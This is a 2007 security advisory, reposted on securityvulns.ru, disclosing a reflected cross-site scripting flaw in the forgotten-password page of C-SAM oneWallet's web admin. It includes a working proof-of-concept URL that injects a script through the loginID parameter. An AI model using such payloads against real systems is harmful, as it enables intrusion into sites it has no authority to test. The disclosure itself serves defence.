Computer Security

Security Advisory: C-SAM oneWallet forget password Cross Site Scripting vulnerability
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  VisionProject Multiple XSS vuln.

  EZPhotoSales 1.9.3 Multiple Vulnerabilities

  PHP mSQL (msql_connect)
Buffer Overflow PoC

  Envolution (News) <= v1.1.0 Remote SQL Injection

From:tusharvartak_(at)_hotmail.com <tusharvartak_(at)_hotmail.com>
Date:07.08.2007
Subject:C-SAM oneWallet forget password Cross Site Scripting vulnerability

A XSS vulnerability is identified in C-SAM oneWallet web admin interface. This vulnerability exists in the forget password page.

http://myserver:myport/tp/web/oneWallet/user/forgotPassStep2.
jsp?loginID=null%22%3e%3cscript%3ealert(%22XSS!%22)
%3c%2fscript%3e

Sucessfully tested with Version 210_07062007;1.0

Vendor Website

http://www.c-sam.com

--Tushar Vartak
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server